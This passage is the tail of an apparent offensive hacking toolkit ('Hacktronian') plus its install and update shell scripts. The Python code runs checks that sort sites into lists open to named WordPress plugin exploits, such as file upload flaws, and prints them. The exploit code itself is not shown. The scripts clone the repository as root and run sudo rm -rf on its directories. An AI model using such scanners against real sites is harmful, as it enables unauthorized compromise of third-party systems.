1757 |     wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
1758 |     wpcontactcreativeform = check_wpcontactcreativeform(sites)
1759 |     wplazyseoplugin = check_wplazyseoplugin(sites)
1760 |     wpeasyupload = check_wpeasyupload(sites)
1761 |     wpsymposium = check_wpsymposium(sites)
1762 |     for ss in wordpress:
1763 |         print ss
1764 |     print '[*] Found, ', len(wordpress), ' wordpress sites.'
1765 |     print '-' * 30 + '\n'
1766 |     for ss in wpstorethemeremotefileupload:
1767 |         print ss
1768 |     print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
1769 |     print '-' * 30 + '\n'
1770 |     for ss in wpcontactcreativeform:
1771 |         print ss
1772 |     print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
1773 |     print '-' * 30 + '\n'
1774 |     for ss in wplazyseoplugin:
1775 |         print ss
1776 |     print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
1777 |     print '-' * 30 + '\n'
1778 |     for ss in wpeasyupload:
1779 |         print ss
1780 |     print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
1781 |     print '-' * 30 + '\n'
1782 |     for ss in wpsymposium:
1783 |         print ss
1784 | 
1785 |     print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'
1786 | 
1787 |     print '\n'
1788 | ############################
1789 | 
1790 | 
1791 | if __name__ == "__main__":
1792 |     try:
1793 |         menu()
1794 |     except KeyboardInterrupt:
1795 |         print(" Finishing up...\r"),
1796 |         time.sleep(0.25)
1797 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | BLACK='\e[30m'
 5 | RED='\e[31m'
 6 | GREEN='\e[32m'
 7 | YELLOW='\e[33m'
 8 | BLUE='\e[34m'
 9 | PURPLE='\e[35m'
10 | CYAN='\e[36m'
11 | WHITE='\e[37m'
12 | NC='\e[0m'
13 | echo""
14 | echo -e "${RED}  _     _         ______ _    _ _______ ______   _____  ______  _____        ______   "
15 | echo " | |   | |  /\   / _____) |  / |_______|_____ \ / ___ \|  ___ \(_____)  /\  |  ___ \  "
16 | echo " | |__ | | /  \ | /     | | / / _       _____) ) |   | | |   | |  _    /  \ | |   | | "
17 | echo " |  __)| |/ /\ \| |     | |< < | |     (_____ (| |   | | |   | | | |  / /\ \| |   | | "
18 | echo " | |   | | |__| | \_____| | \ \| |_____      | | |___| | |   | |_| |_| |__| | |   | | "
19 | echo " |_|   |_|______|\______)_|  \_)\______)     |_|\_____/|_|   |_(_____)______|_|   |_| "
20 | echo -e "${RED}                                                      ~ Tools for Hacking by Mr. SAGE ${NC}"
21 | echo ""
22 | echo -e "${YELLOW} Twitter.com/thehackingsage | Instagram.com/thehackingsage | Github.com/thehackingsage ${NC} "
23 | echo ""
24 | echo "---------------------------------------------------------------------------------------"
25 | echo ""
26 | echo -e "${RED}[!] This Tool Must Run As ROOT [!]${NC}"
27 | echo ""
28 | echo -e "${CYAN}[>] Press ENTER to Install Hacktronian, CTRL+C to Abort.${NC}"
29 | read INPUT
30 | echo ""
31 | 
32 | if [ "$PREFIX" = "/data/data/com.termux/files/usr" ]; then
33 |     INSTALL_DIR="$PREFIX/usr/share/doc/hacktronian"
34 |     BIN_DIR="$PREFIX/usr/bin/"
35 |     pkg install -y git python2
36 | else
37 |     INSTALL_DIR="/usr/share/doc/hacktronian"
38 |     BIN_DIR="/usr/bin/"
39 | fi
40 | 
41 | echo "[✔] Checking directories...";
42 | if [ -d "$INSTALL_DIR" ]; then
43 |     echo "[!] A Directory hacktronian Was Found.. Do You Want To Replace It ? [y/n]:" ;
44 |     read mama
45 |     if [ "$mama" = "y" ]; then
46 |         rm -R "$INSTALL_DIR"
47 |     else
48 |         exit
49 |     fi
50 | fi
51 | 
52 | echo "[✔] Installing ...";
53 | echo "";
54 | git clone https://github.com/thehackingsage/hacktronian.git "$INSTALL_DIR";
55 | echo "#!/bin/bash
56 | python $INSTALL_DIR/hacktronian.py" '${1+"$@"}' > hacktronian;
57 | chmod +x hacktronian;
58 | sudo cp hacktronian /usr/bin/;
59 | rm hacktronian;
60 | 
61 | 
62 | if [ -d "$INSTALL_DIR" ] ;
63 | then
64 |     echo "";
65 |     echo "[✔] Successfuly Installed !!! [✔]";
66 |     echo "";
67 |     echo "[✔]========================================================================[✔]";
68 |     echo "[✔] ✔✔✔ All Is Done!! you can execute tool by typing hacktronian !! ✔✔✔ [✔]";
69 |     echo "[✔]========================================================================[✔]";
70 |     echo "";
71 | else
72 |     echo "[✘] Installation Failed !!! [✘]";
73 |     exit
74 | fi
75 | 


--------------------------------------------------------------------------------
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RexTheGod/hacktronian/e2ac0a4cdd5d1164c9efe6f11b0be679e6a00cbf/logo.png


--------------------------------------------------------------------------------
/update.sh:
--------------------------------------------------------------------------------
 1 | #
 2 | #   _   _   ___  _____  _   _____________ _____ _   _ _____  ___   _   _ 
 3 | #  | | | | / _ \/  __ \| | / /_   _| ___ \  _  | \ | |_   _|/ _ \ | \ | |
 4 | #  | |_| |/ /_\ \ /  \/| |/ /  | | | |_/ / | | |  \| | | | / /_\ \|  \| |
 5 | #  |  _  ||  _  | |    |    \  | | |    /| | | | . ` | | | |  _  || . ` |
 6 | #  | | | || | | | \__/\| |\  \ | | | |\ \\ \_/ / |\  |_| |_| | | || |\  |
 7 | #  \_| |_/\_| |_/\____/\_| \_/ \_/ \_| \_|\___/\_| \_/\___/\_| |_/\_| \_/
 8 | #
 9 | #                   ~ Tools For Hacking by Mr. SAGE ~
10 | 
11 | clear
12 | 
13 | sudo chmod +x /etc/
14 | 
15 | clear
16 | 
17 | sudo chmod +x /usr/share/doc
18 | 
19 | clear
20 | 
21 | sudo rm -rf /usr/share/doc/hacktronian/
22 | 
23 | clear
24 | 
25 | cd /etc/
26 | 
27 | clear
28 | 
29 | sudo rm -rf /etc/thehackingsage
30 | 
31 | clear
32 | 
33 | mkdir thehackingsage
34 | 
35 | clear
36 | 
37 | cd thehackingsage
38 | 
39 | clear
40 | 
41 | git clone https://github.com/thehackingsage/hacktronian.git
42 | 
43 | clear
44 | 
45 | cd hacktronian
46 | 
47 | clear
48 | 
49 | sudo chmod +x install.sh
50 | 
51 | clear
52 | 
53 | ./install.sh
54 | 
55 | clear
56 | 


--------------------------------------------------------------------------------